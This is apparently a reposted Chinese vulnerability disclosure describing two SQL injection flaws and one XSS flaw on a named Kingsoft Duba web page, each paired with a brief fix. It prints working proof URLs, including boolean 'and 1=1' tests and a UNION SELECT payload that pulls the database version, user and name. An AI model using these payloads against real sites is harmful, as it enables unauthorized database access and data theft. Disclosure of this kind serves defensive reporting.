当前位置: 移动技术网 > 网络运营>安全>漏洞 > 金山毒霸多个sql注入及XSS漏洞和修复

金山毒霸多个sql注入及XSS漏洞和修复

2018年03月10日  | 移动技术网网络运营  | 我要评论

  第一个

  简要描述:由于变量过滤不严产生sql注入漏洞 可通过入侵手段 拿到站点权限

  详细说明:http://labs.duba.net/kws/feedback2/his.php?uuid=622d988684f34161bc09e869db38bf3b&app=2

  漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=622d988684f34161bc09e869db38bf3b&app=2 and 1=1

  http://labs.duba.net/kws/feedback2/his.php?uuid=622d988684f34161bc09e869db38bf3b&app=2 and 1=2

  结果明显不同 注入漏洞产生

  修复方案:过滤变量app

  第二个

  简要描述:过滤不严导致存在sql注入

  详细说明:过滤不严导致存在sql注入 有机会拿下服务器权限

  漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12b70c061426aaa96f58ae431d180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

  http://labs.duba.net/robots.txt

  未作进一步测试

  修复方案:过滤参数

  第三个:

  简要描述:留言处过滤不严 造成跨站漏洞

  详细说明:留言处过滤不严 造成跨站漏洞

  漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12b70c061426aaa96f58ae431d180055&app=5

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网